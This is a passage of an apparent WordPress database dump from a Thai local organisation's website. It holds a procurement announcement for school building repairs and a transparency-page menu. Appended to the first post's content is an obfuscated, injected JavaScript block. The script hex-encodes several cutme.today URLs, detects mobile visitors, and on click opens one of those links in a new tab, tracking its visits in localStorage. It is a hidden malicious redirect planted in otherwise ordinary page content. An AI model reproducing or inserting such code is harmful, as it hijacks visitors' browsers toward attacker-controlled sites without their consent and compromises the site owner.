จ้างปรับปรุงซ่อมแซมอาคารเรียน อาคารประกอบและสิ่งก่อสร้างอื่น\"></object><a id=\"wp-block-file--media-de7b9fcc-20b3-46ff-842a-27798e4bf26e\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศผู้ชนะการเสนอราคา-จ้างปรับปรุงซ่อมแซมอาคารเรียน-อาคารประกอบและสิ่งก่อสร้างอื่น.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">ประกาศผู้ชนะการเสนอราคา จ้างปรับปรุงซ่อมแซมอาคารเรียน อาคารประกอบและสิ่งก่อสร้างอื่น</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประกาศผู้ชนะการเสนอราคา-จ้างปรับปรุงซ่อมแซมอาคารเรียน-อาคารประกอบและสิ่งก่อสร้างอื่น.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-de7b9fcc-20b3-46ff-842a-27798e4bf26e\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ','','inherit','closed','closed','','1059-revision-v1','','','2024-08-23 14:39:10','2024-08-23 07:39:10','',1059,'http://pakhaeng.ssk.in.th/?p=1069',0,'revision','',0),
(1070,1,'2024-08-23 14:39:44','2024-08-23 07:39:44','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":892,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post-2.png\" alt=\"\" title=\"Is It a Gift Instagram Post\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"layout\":\"vtabs\",\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#8ed1fc\",\"titleBgHover\":\"#8ed1fc\",\"titleBgActive\":\"#0693e3\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-1 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_a471bf-67\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_a471bf-67\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">โครงสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cba98e-ee\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cba98e-ee\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">อำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_1087e8-9a\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_1087e8-9a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\">Q&amp;A</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_a3f15d-d7\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_a3f15d-d7\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_eb0ffb-85\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb0ffb-85\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_df06d7-11\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_df06d7-11\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_006068-f2\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_006068-f2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"_bcc767-12\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab_bcc767-12\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=840\" data-type=\"page\" data-id=\"840\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a 